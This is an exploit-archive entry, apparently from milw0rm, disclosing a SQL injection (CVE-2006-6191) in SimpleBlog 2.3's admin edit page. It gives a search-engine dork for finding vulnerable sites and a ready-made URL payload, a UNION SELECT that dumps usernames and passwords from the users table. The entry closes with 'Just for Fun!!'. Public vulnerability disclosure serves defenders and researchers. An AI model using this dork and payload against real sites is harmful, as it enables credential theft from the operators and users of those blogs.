[] NeoSense

SimpleBlog 2.3 - '/admin/edit.asp' SQL Injection

Author: bolivar
type: webapps
platform: asp
port: 
date_added: 2006-11-25 
date_updated:  
verified: 1 
codes: OSVDB-30757;CVE-2006-6191 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Title   :  simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author  :  bolivar
# Dork    :  "SimpleBlog 2.3 by 8pixel.net"

---------------------------------------------------------------------------

http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users

---------------------------------------------------------------------------
# Just for Fun!!

# milw0rm.com [2006-11-26]